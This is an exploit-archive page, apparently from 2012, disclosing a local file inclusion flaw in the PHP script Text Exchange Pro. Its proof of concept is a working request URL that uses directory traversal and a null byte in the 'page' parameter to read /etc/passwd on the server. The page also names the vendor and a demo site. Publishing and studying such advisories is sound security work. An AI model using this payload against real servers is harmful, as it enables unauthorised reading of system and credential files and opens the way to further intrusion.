[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Text Exchange Pro (index.php page) Local File Inclusion
# Published : 2012-08-24
# Author :
# Previous Title : akcms v4.2.4 Information Disclosure Vulnerability
# Next Title : VICIDIAL Call Center Suite <=2.2.1-237 Multiple Vulnerabilities
-----------------------------------------------------------
Text Exchange Pro (index.php page) Local file inclusion
Bug discovered by Yakir Wizman
Date 24/08/2012
Vendor Homepage - http://www.phpwebscripts.com/text-exchange-pro/
Demo - http://www.scripts-demo.com/textexchangepro/
ISRAEL
-----------------------------------------------------------
Author will be not responsible for any damage.
-----------------------------------------------------------
About the Application
-----------------------------------------------------------
Text Exchange Pro is an unique PHP script for running your own text link exchange system.
Proof Of Conecpt
-----------------------------------------------------------
Local file inclusion (Severity is high)
Vulnerable URL : http://server/textexchangepro/index.php?page=../../../../../../../../../../etc/passwd%00